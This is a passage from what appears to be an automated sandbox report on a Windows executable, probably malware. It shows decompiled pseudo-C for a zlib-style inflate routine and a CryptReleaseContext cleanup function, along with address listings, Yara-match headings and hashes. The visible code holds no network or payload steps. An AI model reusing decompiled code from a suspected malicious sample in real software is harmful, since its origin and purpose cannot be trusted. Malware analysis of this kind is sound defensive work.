							 *(__esi + 0x10) = 7;
							__eax = E00404FA0( *(__esi + 0xc), __eax, __ecx,  *((intOrPtr*)(__esi + 0x24)), __edi);
							 *(__ebp - 0xc) = __eax;
							__eflags = __eax;
							if(__eax != 0) {
								__eflags =  *(__ebp - 0xc) - 0xfffffffd;
								goto L113;
							}
							_t182 = __esi + 8;
							 *_t182 =  *(__esi + 8) & __eax;
							__eflags =  *_t182;
							 *__esi = 5;
							goto L68;
						} else {
							goto L59;
						}
						do {
							L59:
							__ecx =  *(__ebp + 0xc);
							while(1) {
								__eflags = __ecx - 3;
								if(__ecx >= 3) {
									goto L63;
								}
								__eflags =  *(__ebp - 4);
								if( *(__ebp - 4) == 0) {
									goto L107;
								}
								__eax =  *__ebx & 0x000000ff;
								 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
								 *(__ebp - 4) =  *(__ebp - 4) - 1;
								__eax = ( *__ebx & 0x000000ff) << __cl;
								 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
								__ebx = __ebx + 1;
								__ecx = __ecx + 8;
								 *(__ebp + 0xc) = __ecx;
							}
							L63:
							__ecx =  *(__esi + 8);
							__eax =  *(__ebp + 8);
							__edx =  *(__esi + 0xc);
							__eax =  *(__ebp + 8) & 0x00000007;
							__ecx =  *(0x40cdf0 +  *(__esi + 8) * 4);
							 *(__ebp + 0xc) =  *(__ebp + 0xc) - 3;
							 *(__ebp + 8) =  *(__ebp + 8) >> 3;
							 *( *(__esi + 0xc) +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) =  *(__ebp + 8) & 0x00000007;
							__ecx =  *(__esi + 4);
							 *(__esi + 8) =  *(__esi + 8) + 1;
							__eax =  *(__esi + 8);
							 *(__esi + 4) >> 0xa = ( *(__esi + 4) >> 0xa) + 4;
							__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
						} while ( *(__esi + 8) < ( *(__esi + 4) >> 0xa) + 4);
						goto L64;
						L50:
						__ecx =  *(__ebp + 0xc);
						while(1) {
							__eflags = __ecx - 0xe;
							if(__ecx >= 0xe) {
								break;
							}
							__eflags =  *(__ebp - 4);
							if( *(__ebp - 4) == 0) {
								goto L107;
							}
							__eax =  *__ebx & 0x000000ff;
							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
							 *(__ebp - 4) =  *(__ebp - 4) - 1;
							__eax = ( *__ebx & 0x000000ff) << __cl;
							 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
							__ebx = __ebx + 1;
							__ecx = __ecx + 8;
							 *(__ebp + 0xc) = __ecx;
						}
						__eax =  *(__ebp + 8);
						__eax =  *(__ebp + 8) & 0x00003fff;
						__ecx = __eax;
						 *(__esi + 4) = __eax;
						__ecx = __eax & 0x0000001f;
						__eflags = __ecx - 0x1d;
						if(__ecx > 0x1d) {
							L109:
							 *__esi = 9;
							__edi[6] = "too many length or distance symbols";
							break;
						}
						__eax = __eax & 0x000003e0;
						__eflags = (__eax & 0x000003e0) - 0x3a0;
						if((__eax & 0x000003e0) > 0x3a0) {
							goto L109;
						}
						__eax = __eax >> 5;
						__eax = __eax & 0x0000001f;
						__eax = __edi[8](__edi[0xa], __eax, 4);
						__esp = __esp + 0xc;
						 *(__esi + 0xc) = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							goto L116;
						}
						 *(__ebp + 8) =  *(__ebp + 8) >> 0xe;
						 *(__ebp + 0xc) =  *(__ebp + 0xc) - 0xe;
						_t138 = __esi + 8;
						 *_t138 =  *(__esi + 8) & 0x00000000;
						__eflags =  *_t138;
						 *__esi = 4;
						goto L58;
						L27:
						__eflags =  *(__ebp - 4);
						if( *(__ebp - 4) == 0) {
							goto L107;
						}
						__eflags = __ecx;
						if(__ecx != 0) {
							L44:
							__eax =  *(__esi + 4);
							__ecx =  *(__ebp - 4);
							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
							__eflags = __eax - __ecx;
							 *(__ebp - 0xc) = __eax;
							if(__eax > __ecx) {
								 *(__ebp - 0xc) = __ecx;
							}
							__eax =  *(__ebp - 0x10);
							__eflags =  *(__ebp - 0xc) - __eax;
							if( *(__ebp - 0xc) > __eax) {
								 *(__ebp - 0xc) = __eax;
							}
							__eax = memcpy( *(__ebp - 8), __ebx,  *(__ebp - 0xc));
							__eax =  *(__ebp - 0xc);
							__esp = __esp + 0xc;
							 *(__ebp - 4) =  *(__ebp - 4) - __eax;
							 *(__ebp - 8) =  *(__ebp - 8) + __eax;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __eax;
							__ebx = __ebx + __eax;
							_t115 = __esi + 4;
							 *_t115 =  *(__esi + 4) - __eax;
							__eflags =  *_t115;
							if( *_t115 == 0) {
								L49:
								 *(__esi + 0x18) =  ~( *(__esi + 0x18));
								asm("sbb eax, eax");
								__eax =  ~( *(__esi + 0x18)) & 0x00000007;
								L16:
								 *_t488 = _t456;
							}
							goto L98;
						}
						__ecx =  *(__esi + 0x2c);
						__eflags = __edx - __ecx;
						if(__edx != __ecx) {
							L35:
							__eax =  *(__ebp - 8);
							 *(__esi + 0x34) =  *(__ebp - 8);
							__eax = E00403BD6(__ecx, __esi, __edi,  *(__ebp + 0x10));
							__ecx =  *(__esi + 0x30);
							 *(__ebp + 0x10) = __eax;
							__eax =  *(__esi + 0x34);
							__eflags = __eax - __ecx;
							 *(__ebp - 8) = __eax;
							if(__eax >= __ecx) {
								__edx =  *(__esi + 0x2c);
								__edx =  *(__esi + 0x2c) -  *(__ebp - 8);
								__eflags = __edx;
								 *(__ebp - 0x10) = __edx;
							} else {
								__ecx = __ecx -  *(__ebp - 8);
								__eax = __ecx -  *(__ebp - 8) - 1;
								 *(__ebp - 0x10) = __ecx -  *(__ebp - 8) - 1;
							}
							__edx =  *(__esi + 0x2c);
							__eflags =  *(__ebp - 8) - __edx;
							if( *(__ebp - 8) == __edx) {
								__eax =  *(__esi + 0x28);
								__eflags = __eax - __ecx;
								if(__eflags != 0) {
									 *(__ebp - 8) = __eax;
									if(__eflags >= 0) {
										__edx = __edx - __eax;
										__eflags = __edx;
										 *(__ebp - 0x10) = __edx;
									} else {
										__ecx = __ecx - __eax;
										__ecx = __ecx - 1;
										 *(__ebp - 0x10) = __ecx;
									}
								}
							}
							__eflags =  *(__ebp - 0x10);
							if( *(__ebp - 0x10) == 0) {
								__eax =  *(__ebp + 8);
								 *(__esi + 0x20) =  *(__ebp + 8);
								__eax =  *(__ebp + 0xc);
								 *(__esi + 0x1c) =  *(__ebp + 0xc);
								__eax =  *(__ebp - 4);
								__edi[1] =  *(__ebp - 4);
								goto L108;
							} else {
								goto L44;
							}
						}
						__eax =  *(__esi + 0x30);
						__edx =  *(__esi + 0x28);
						__eflags = __edx - __eax;
						if(__eflags == 0) {
							goto L35;
						}
						 *(__ebp - 8) = __edx;
						if(__eflags >= 0) {
							__ecx = __ecx - __edx;
							__eflags = __ecx;
							 *(__ebp - 0x10) = __ecx;
						} else {
							__eax = __eax - __edx;
							 *(__ebp - 0x10) = __eax;
						}
						__eflags =  *(__ebp - 0x10);
						if( *(__ebp - 0x10) != 0) {
							goto L44;
						} else {
							goto L35;
						}
						L20:
						__ecx =  *(__ebp + 0xc);
						while(1) {
							__eflags = __ecx - 0x20;
							if(__ecx >= 0x20) {
								break;
							}
							__eflags =  *(__ebp - 4);
							if( *(__ebp - 4) == 0) {
								goto L107;
							}
							__eax =  *__ebx & 0x000000ff;
							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
							 *(__ebp - 4) =  *(__ebp - 4) - 1;
							__eax = ( *__ebx & 0x000000ff) << __cl;
							 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
							__ebx = __ebx + 1;
							__ecx = __ecx + 8;
							 *(__ebp + 0xc) = __ecx;
						}
						__ecx =  *(__ebp + 8);
						__eax =  *(__ebp + 8);
						__ecx =  !( *(__ebp + 8));
						__eax =  *(__ebp + 8) & 0x0000ffff;
						__ecx =  !( *(__ebp + 8)) >> 0x10;
						__ecx =  !( *(__ebp + 8)) >> 0x00000010 ^ __eax;
						__eflags = __ecx;
						if(__ecx != 0) {
							 *__esi = 9;
							__edi[6] = "invalid stored block lengths";
							break;
						}
						 *(__esi + 4) = __eax;
						__eax = 0;
						__eflags =  *(__esi + 4);
						 *(__ebp + 0xc) = 0;
						 *(__ebp + 8) = 0;
						if( *(__esi + 4) == 0) {
							goto L49;
						}
						__eax = 2;
						goto L16;
						L7:
						while( *(_t490 + 0xc) < 3) {
							if( *(_t490 - 4) == 0) {
								goto L107;
							}
							_t479 =  *(_t490 + 0xc);
							 *(_t490 + 0x10) =  *(_t490 + 0x10) & 0x00000000;
							 *(_t490 - 4) =  *(_t490 - 4) - 1;
							 *(_t490 + 8) =  *(_t490 + 8) | ( *_t476 & 0x000000ff) <<  *(_t490 + 0xc);
							_t476 =  &(_t476[1]);
							 *(_t490 + 0xc) =  *(_t490 + 0xc) + 8;
						}
						_t436 =  *(_t490 + 8) & 0x00000007;
						_t479 = _t436 & 0x00000001;
						_t438 = _t436 >> 1;
						__eflags = _t438;
						_t488[6] = _t436 & 0x00000001;
						if(_t438 == 0) {
							 *(_t490 + 0xc) =  *(_t490 + 0xc) - 3;
							 *_t488 = 1;
							_t479 =  *(_t490 + 0xc) & 0x00000007;
							 *(_t490 + 0xc) =  *(_t490 + 0xc) - _t479;
							 *(_t490 + 8) =  *(_t490 + 8) >> 3 >> _t479;
							goto L98;
						}
						_t442 = _t438 - 1;
						__eflags = _t442;
						if(_t442 == 0) {
							_push(_t485);
							E00405122(_t490 - 0x24, _t490 - 0x20, _t490 - 0x1c, _t490 - 0x18);
							_t448 = E00403CC8( *((intOrPtr*)(_t490 - 0x24)),  *((intOrPtr*)(_t490 - 0x20)),  *((intOrPtr*)(_t490 - 0x1c)),  *((intOrPtr*)(_t490 - 0x18)), _t485);
							_t493 = _t493 + 0x28;
							_t488[1] = _t448;
							__eflags = _t448;
							if(_t448 == 0) {
								goto L116;
							}
							 *(_t490 + 8) =  *(_t490 + 8) >> 3;
							 *(_t490 + 0xc) =  *(_t490 + 0xc) - 3;
							 *_t488 = 6;
							goto L98;
						}
						_t455 = _t442 - 1;
						__eflags = _t455;
						if(_t455 == 0) {
							 *(_t490 + 8) =  *(_t490 + 8) >> 3;
							_t456 = 3;
							_t33 = _t490 + 0xc;
							 *_t33 =  *(_t490 + 0xc) - _t456;
							__eflags =  *_t33;
							goto L16;
						}
						__eflags = _t455 == 1;
						if(_t455 == 1) {
							 *_t488 = 9;
							 *(_t485 + 0x18) = "invalid block type";
							_t488[8] =  *(_t490 + 8) >> 3;
							_t461 =  *(_t490 + 0xc) + 0xfffffffd;
							L105:
							_t488[7] = _t461;
							 *(_t485 + 4) =  *(_t490 - 4);
							 *_t485 = _t476;
							_push(0xfffffffd);
							 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
							_t488[0xd] =  *(_t490 - 8);
							goto L100;
						}
						goto L98;
					}
					L104:
					__eax =  *(__ebp + 8);
					 *(__esi + 0x20) =  *(__ebp + 8);
					__eax =  *(__ebp + 0xc);
					goto L105;
					L122:
					__eax =  *(__ebp + 8);
					_push(1);
					 *(__esi + 0x20) =  *(__ebp + 8);
					__eax =  *(__ebp + 0xc);
					 *(__esi + 0x1c) =  *(__ebp + 0xc);
					__eax =  *(__ebp - 4);
					__edi[1] =  *(__ebp - 4);
					__ebx = __ebx -  *__edi;
					 *__edi = __ebx;
					__edi[2] = __edi[2] + __ebx -  *__edi;
					__eax =  *(__ebp - 8);
					 *(__esi + 0x34) =  *(__ebp - 8);
					goto L100;
					L118:
					__eax =  *(__ebp - 8);
					 *(__esi + 0x34) =  *(__ebp - 8);
					__eax = E00403BD6(__ecx, __esi, __edi,  *(__ebp + 0x10));
					__ecx =  *(__esi + 0x34);
					__eflags =  *(__esi + 0x30) - __ecx;
					 *(__ebp - 8) = __ecx;
					if( *(__esi + 0x30) == __ecx) {
						 *__esi = 8;
						goto L122;
					}
					__ecx =  *(__ebp + 8);
					 *(__esi + 0x20) =  *(__ebp + 8);
					__ecx =  *(__ebp + 0xc);
					 *(__esi + 0x1c) =  *(__ebp + 0xc);
					__ecx =  *(__ebp - 4);
					__edi[1] =  *(__ebp - 4);
					__ebx = __ebx -  *__edi;
					 *__edi = __ebx;
					_t409 =  &(__edi[2]);
					 *_t409 = __edi[2] + __ebx -  *__edi;
					__eflags =  *_t409;
					__ecx =  *(__ebp - 8);
					 *(__esi + 0x34) = __ecx;
					goto L120;
				}
			}























                    0x004043b7
                    0x004043b9
                    0x004043be
                    0x004043c2
                    0x004043c5
                    0x004043cb
                    0x004043cd
                    0x004043d3
                    0x004043d9
                    0x004043dc
                    0x004043e1
                    0x004043e4
                    0x004043f0
                    0x004043f0
                    0x004043e6
                    0x004043e9
                    0x004043e9
                    0x004043f2
                    0x004043f4
                    0x004043fa
                    0x004049c2
                    0x004049c5
                    0x004049c7
                    0x004049cd
                    0x004049d3
                    0x004049da
                    0x004049dc
                    0x004049dc
                    0x004049dc
                    0x004049e2
                    0x00000000
                    0x00404400
                    0x00404408
                    0x00404408
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404935
                    0x00404935
                    0x0040493b
                    0x0040493e
                    0x00404941
                    0x00404944
                    0x00404947
                    0x0040494c
                    0x0040494f
                    0x00404952
                    0x00404955
                    0x00404958
                    0x0040495b
                    0x00404963
                    0x00404966
                    0x00404b89
                    0x00404b89
                    0x004049e5
                    0x004049e5
                    0x004049e6
                    0x004049e7
                    0x004049ef
                    0x004049f3
                    0x004049f3
                    0x0040496c
                    0x00404979
                    0x0040497c
                    0x0040497e
                    0x00404981
                    0x00404984
                    0x00404985
                    0x00404988
                    0x0040498b
                    0x0040498c
                    0x0040498f
                    0x00404992
                    0x00404995
                    0x00404998
                    0x0040499a
                    0x004049a1
                    0x004049a4
                    0x004049a4
                    0x0040499c
                    0x0040499c
                    0x0040499e
                    0x0040499e
                    0x004049a7
                    0x004049ab
                    0x004049ae
                    0x00404b44
                    0x00000000
                    0x004049b4
                    0x004049b4
                    0x004049b4
                    0x004049b7
                    0x004049b7
                    0x004049b9
                    0x004049bc
                    0x00404402
                    0x00000000
                    0x00404405
                    0x00000000
                    0x004049bc
                    0x0040476e
                    0x0040476e
                    0x0040476e
                    0x00404771
                    0x00404774
                    0x00404776
                    0x00404779
                    0x0040477c
                    0x0040477f
                    0x0040477f
                    0x00404786
                    0x00404788
                    0x00000000
                    0x00000000
                    0x0040478e
                    0x00404791
                    0x00404791
                    0x00404794
                    0x00000000
                    0x00000000
                    0x00404796
                    0x0040479a
                    0x00404a58
                    0x00404a5b
                    0x00404a61
                    0x00404a64
                    0x00404a64
                    0x00404a64
                    0x00404a68
                    0x00404a6a
                    0x00404a6f
                    0x00404a71
                    0x00404a77
                    0x00000000
                    0x00404a77
                    0x004047a0
                    0x004047a3
                    0x004047a6
                    0x004047aa
                    0x004047ad
                    0x004047af
                    0x004047b2
                    0x004047b3
                    0x004047b3
                    0x004047b9
                    0x004047c0
                    0x004047c3
                    0x004047c6
                    0x004047ca
                    0x004047cd
                    0x004047d0
                    0x004047d3
                    0x004047d7
                    0x004047da
                    0x004047f5
                    0x004047f8
                    0x004047ff
                    0x004047ff
                    0x004047fa
                    0x004047fc
                    0x004047fc
                    0x00404802
                    0x00404804
                    0x0040480a
                    0x0040480b
                    0x0040480e
                    0x0040480e
                    0x00404811
                    0x00404814
                    0x00404814
                    0x00404817
                    0x0040481a
                    0x0040481d
                    0x00000000
                    0x00000000
                    0x0040481f
                    0x00404823
                    0x00000000
                    0x00000000
                    0x00404829
                    0x0040482c
                    0x0040482f
                    0x00404833
                    0x00404836
                    0x00404838
                    0x0040483b
                    0x0040483c
                    0x0040483c
                    0x00404842
                    0x0040484c
                    0x0040484f
                    0x00404852
                    0x00404854
                    0x00404857
                    0x0040485a
                    0x0040485c
                    0x0040485f
                    0x00404862
                    0x00404865
                    0x00404867
                    0x0040486a
                    0x0040486d
                    0x00404870
                    0x00404870
                    0x0040487a
                    0x0040487c
                    0x0040487e
                    0x00404a94
                    0x00404a9d
                    0x00404aa0
                    0x00404aa6
                    0x00404aad
                    0x00404ab0
                    0x00404ab5
                    0x00404ab8
                    0x00404abb
                    0x00404ac0
                    0x00404ac3
                    0x00404ac6
                    0x00404ac9
                    0x00404acc
                    0x00404acf
                    0x00000000
                    0x00404ad4
                    0x00404884
                    0x00404888
                    0x0040489c
                    0x0040489c
                    0x0040489e
                    0x0040489e
                    0x0040489e
                    0x004048a1
                    0x004048a4
                    0x004048a5
                    0x004048a5
                    0x004048a5
                    0x004048a5
                    0x004048aa
                    0x00000000
                    0x004048aa
                    0x0040488a
                    0x0040488d
                    0x00000000
                    0x00000000
                    0x00404893
                    0x00404896
                    0x00000000
                    0x00404896
                    0x004047dc
                    0x004047df
                    0x004047e1
                    0x004047e4
                    0x004047e7
                    0x004047ea
                    0x004047ed
                    0x004047ed
                    0x004048b3
                    0x004048b9
                    0x004048bc
                    0x004048c0
                    0x004048cc
                    0x004048d0
                    0x004048d4
                    0x004048d9
                    0x004048dc
                    0x004048df
                    0x004048e2
                    0x004048e7
                    0x004048e8
                    0x004048f1
                    0x004048f9
                    0x004048fc
                    0x004048fe
                    0x00404adc
                    0x00404ae0
                    0x00404ae0
                    0x00404ae8
                    0x00404aeb
                    0x00404aec
                    0x00404af2
                    0x00404af2
                    0x00404af3
                    0x00404af6
                    0x00404af9
                    0x00404afc
                    0x00404aff
                    0x00404b02
                    0x00404b05
                    0x00404b0a
                    0x00404b0c
                    0x00404b0e
                    0x00404b11
                    0x00404b14
                    0x00000000
                    0x00404b14
                    0x00404911
                    0x00404919
                    0x0040491b
                    0x00404b1c
                    0x00404b1f
                    0x00404b21
                    0x00404b27
                    0x00404b2d
                    0x00404b34
                    0x00404b36
                    0x00404b3c
                    0x00000000
                    0x00404b3c
                    0x00404924
                    0x0040492a
                    0x0040492d
                    0x0040492e
                    0x00404934
                    0x00000000
                    0x004046b8
                    0x004046bb
                    0x004046be
                    0x004046c1
                    0x004046c4
                    0x00404721
                    0x00404721
                    0x00404721
                    0x00404725
                    0x00000000
                    0x00000000
                    0x00404727
                    0x0040472a
                    0x00404734
                    0x00404738
                    0x00404738
                    0x0040473e
                    0x00404744
                    0x0040474c
                    0x00404752
                    0x0040475a
                    0x0040475d
                    0x0040475f
                    0x00404a8e
                    0x00000000
                    0x00404a8e
                    0x00404765
                    0x00404765
                    0x00404765
                    0x00404768
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004046c6
                    0x004046c6
                    0x004046c6
                    0x004046c9
                    0x004046c9
                    0x004046cc
                    0x00000000
                    0x00000000
                    0x004046ce
                    0x004046d2
                    0x00000000
                    0x00000000
                    0x004046d8
                    0x004046db
                    0x004046df
                    0x004046e2
                    0x004046e4
                    0x004046e7
                    0x004046e8
                    0x004046eb
                    0x004046eb
                    0x004046f0
                    0x004046f0
                    0x004046f3
                    0x004046f6
                    0x004046f9
                    0x004046fc
                    0x00404703
                    0x00404707
                    0x0040470b
                    0x0040470e
                    0x00404711
                    0x00404714
                    0x0040471a
                    0x0040471d
                    0x0040471d
                    0x00000000
                    0x0040462b
                    0x0040462b
                    0x0040462e
                    0x0040462e
                    0x00404631
                    0x00000000
                    0x00000000
                    0x00404633
                    0x00404637
                    0x00000000
                    0x00000000
                    0x0040463d
                    0x00404640
                    0x00404644
                    0x00404647
                    0x00404649
                    0x0040464c
                    0x0040464d
                    0x00404650
                    0x00404650
                    0x00404655
                    0x00404658
                    0x0040465d
                    0x0040465f
                    0x00404662
                    0x00404665
                    0x00404668
                    0x00404a7f
                    0x00404a7f
                    0x00404a85
                    0x00000000
                    0x00404a85
                    0x00404670
                    0x00404676
                    0x0040467c
                    0x00000000
                    0x00000000
                    0x00404682
                    0x00404685
                    0x00404695
                    0x00404698
                    0x0040469b
                    0x0040469e
                    0x004046a0
                    0x00000000
                    0x00000000
                    0x004046a6
                    0x004046aa
                    0x004046ae
                    0x004046ae
                    0x004046ae
                    0x004046b2
                    0x00000000
                    0x0040453a
                    0x0040453a
                    0x0040453e
                    0x00000000
                    0x00000000
                    0x00404544
                    0x00404546
                    0x004045d7
                    0x004045d7
                    0x004045da
                    0x004045dd
                    0x004045e1
                    0x004045e3
                    0x004045e6
                    0x004045e8
                    0x004045e8
                    0x004045eb
                    0x004045ee
                    0x004045f1
                    0x004045f3
                    0x004045f3
                    0x004045fd
                    0x00404602
                    0x00404605
                    0x00404608
                    0x0040460b
                    0x0040460e
                    0x00404611
                    0x00404613
                    0x00404613
                    0x00404613
                    0x00404616
                    0x0040461c
                    0x0040461f
                    0x00404621
                    0x00404623
                    0x00404469
                    0x00404469
                    0x00404469
                    0x00000000
                    0x00404616
                    0x0040454c
                    0x0040454f
                    0x00404551
                    0x00404575
                    0x00404578
                    0x0040457b
                    0x00404580
                    0x00404585
                    0x00404588
                    0x0040458b
                    0x00404591
                    0x00404593
                    0x00404596
                    0x004045a3
                    0x004045a6
                    0x004045a6
                    0x004045a9
                    0x00404598
                    0x0040459a
                    0x0040459d
                    0x0040459e
                    0x0040459e
                    0x004045ac
                    0x004045af
                    0x004045b2
                    0x004045b4
                    0x004045b7
                    0x004045b9
                    0x004045bb
                    0x004045be
                    0x004045c8
                    0x004045c8
                    0x004045ca
                    0x004045c0
                    0x004045c0
                    0x004045c2
                    0x004045c3
                    0x004045c3
                    0x004045be
                    0x004045b9
                    0x004045cd
                    0x004045d1
                    0x00404a44
                    0x00404a47
                    0x00404a4a
                    0x00404a4d
                    0x00404a50
                    0x00404a53
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004045d1
                    0x00404553
                    0x00404556
                    0x00404559
                    0x0040455b
                    0x00000000
                    0x00000000
                    0x0040455d
                    0x00404560
                    0x0040456a
                    0x0040456a
                    0x0040456c
                    0x00404562
                    0x00404562
                    0x00404565
                    0x00404565
                    0x0040456f
                    0x00404573
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004044dc
                    0x004044dc
                    0x004044df
                    0x004044df
                    0x004044e2
                    0x00000000
                    0x00000000
                    0x004044e4
                    0x004044e8
                    0x00000000
                    0x00000000
                    0x004044ee
                    0x004044f1
                    0x004044f5
                    0x004044f8
                    0x004044fa
                    0x004044fd
                    0x004044fe
                    0x00404501
                    0x00404501
                    0x00404506
                    0x00404509
                    0x0040450c
                    0x0040450e
                    0x00404513
                    0x00404516
                    0x00404516
                    0x00404518
                    0x00404a12
                    0x00404a18
                    0x00000000
                    0x00404a18
                    0x0040451e
                    0x00404521
                    0x00404523
                    0x00404526
                    0x00404529
                    0x0040452c
                    0x00000000
                    0x00000000
                    0x00404534
                    0x00000000
                    0x00000000
                    0x0040440f
                    0x00404419
                    0x00000000
                    0x00000000
                    0x00404422
                    0x00404425
                    0x00404429
                    0x0040442e
                    0x00404431
                    0x00404432
                    0x00404432
                    0x0040443b
                    0x00404442
                    0x00404445
                    0x00404445
                    0x00404448
                    0x0040444b
                    0x004044b9
                    0x004044c3
                    0x004044c9
                    0x004044d1
                    0x004044d4
                    0x00000000
                    0x004044d4
                    0x0040444d
                    0x0040444d
                    0x0040444e
                    0x00404473
                    0x00404481
                    0x00404493
                    0x00404498
                    0x0040449b
                    0x0040449e
                    0x004044a0
                    0x00000000
                    0x00000000
                    0x004044a6
                    0x004044aa
                    0x004044ae
                    0x00000000
                    0x004044ae
                    0x00404450
                    0x00404450
                    0x00404451
                    0x0040445f
                    0x00404465
                    0x00404466
                    0x00404466
                    0x00404466
                    0x00000000
                    0x00404466
                    0x00404453
                    0x00404454
                    0x004049f7
                    0x00404a00
                    0x00404a07
                    0x00404a0d
                    0x00404a28
                    0x00404a28
                    0x00404a2e
                    0x00404a35
                    0x00404a37
                    0x00404a39
                    0x00404a3f
                    0x00000000
                    0x00404a3f
                    0x00000000
                    0x0040445a
                    0x00404a1f
                    0x00404a1f
                    0x00404a22
                    0x00404a25
                    0x00000000
                    0x00404b95
                    0x00404b95
                    0x00404b98
                    0x00404b9a
                    0x00404b9d
                    0x00404ba0
                    0x00404ba3
                    0x00404ba6
                    0x00404bab
                    0x00404bad
                    0x00404baf
                    0x00404bb2
                    0x00404bb5
                    0x00000000
                    0x00404b4a
                    0x00404b4d
                    0x00404b50
                    0x00404b55
                    0x00404b5a
                    0x00404b60
                    0x00404b63
                    0x00404b66
                    0x00404b8f
                    0x00000000
                    0x00404b8f
                    0x00404b68
                    0x00404b6b
                    0x00404b6e
                    0x00404b71
                    0x00404b74
                    0x00404b77
                    0x00404b7c
                    0x00404b7e
                    0x00404b80
                    0x00404b80
                    0x00404b80
                    0x00404b83
                    0x00404b86
                    0x00000000
                    0x00404b86

                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: memcpy
                    • String ID:
                    • API String ID: 3510742995-0
                    • Opcode ID: f98d37e25a52c04dcc5b825836114b3c9bed0208ddb816caf6c63d538b842863
                    • Instruction ID: 90343a8667ee0670e87e021bba3e221c8adc0c1da1bb1a76252bfdf766af77e9
                    • Opcode Fuzzy Hash: f98d37e25a52c04dcc5b825836114b3c9bed0208ddb816caf6c63d538b842863
                    • Instruction Fuzzy Hash: FB520CB5900609EFCB14CF69C580AAABBF1FF49315F10852EE95AA7780D338EA55CF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004018B9 Relevance: 1.5, APIs: 1, Instructions: 25encryptionCOMMON
                    Download Yara Rule
                    C-Code - Quality: 16%
                    			E004018B9(void* __ecx) {
				signed int _t10;
				signed int _t11;
				long* _t12;
				void* _t13;
				void* _t18;

				_t18 = __ecx;
				_t10 =  *(__ecx + 8);
				if(_t10 != 0) {
					 *0x40f89c(_t10);
					 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
				}
				_t11 =  *(_t18 + 0xc);
				if(_t11 != 0) {
					 *0x40f89c(_t11);
					 *(_t18 + 0xc) =  *(_t18 + 0xc) & 0x00000000;
				}
				_t12 =  *(_t18 + 4);
				if(_t12 != 0) {
					CryptReleaseContext(_t12, 0);
					 *(_t18 + 4) =  *(_t18 + 4) & 0x00000000;
				}
				_t13 = 1;
				return _t13;
			}








                    0x004018ba
                    0x004018bc
                    0x004018c1
                    0x004018c4
                    0x004018ca
                    0x004018ca
                    0x004018ce
                    0x004018d3
                    0x004018d6
                    0x004018dc
                    0x004018dc
                    0x004018e0
                    0x004018e5
                    0x004018ea
                    0x004018f0
                    0x004018f0
                    0x004018f6
                    0x004018f8

                    APIs
                    • CryptReleaseContext.ADVAPI32(?,00000000,?,004013DB,?,?,?,0040139D,?,?,00401366), ref: 004018EA
                    Memory Dump Source
                    • Source File: 00000002.00000002.310444213.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.310436542.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310453495.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310462960.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310470058.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000002.00000002.310783041.0000000000540000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: ContextCryptRelease
                    • String ID:
                    • API String ID: 829835001-0
                    • Opcode ID: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                    • Instruction ID: 2349b07d823645f04250185dd133334db1216db109592f97c32ed3e6f6040a2b
                    • Opcode Fuzzy Hash: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                    • Instruction Fuzzy Hash: C7E0ED323147019BEB30AB65ED49B5373E8AF00762F04C83DB05AE6990CBB9E8448A58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404C19 Relevance: .3, Instructions: 331COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E00404C19(signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, signed int _a28, intOrPtr _a32, signed int* _a36, signed char* _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed char* _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr* _v36;
				void* _v40;
				char _v43;
				signed char _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
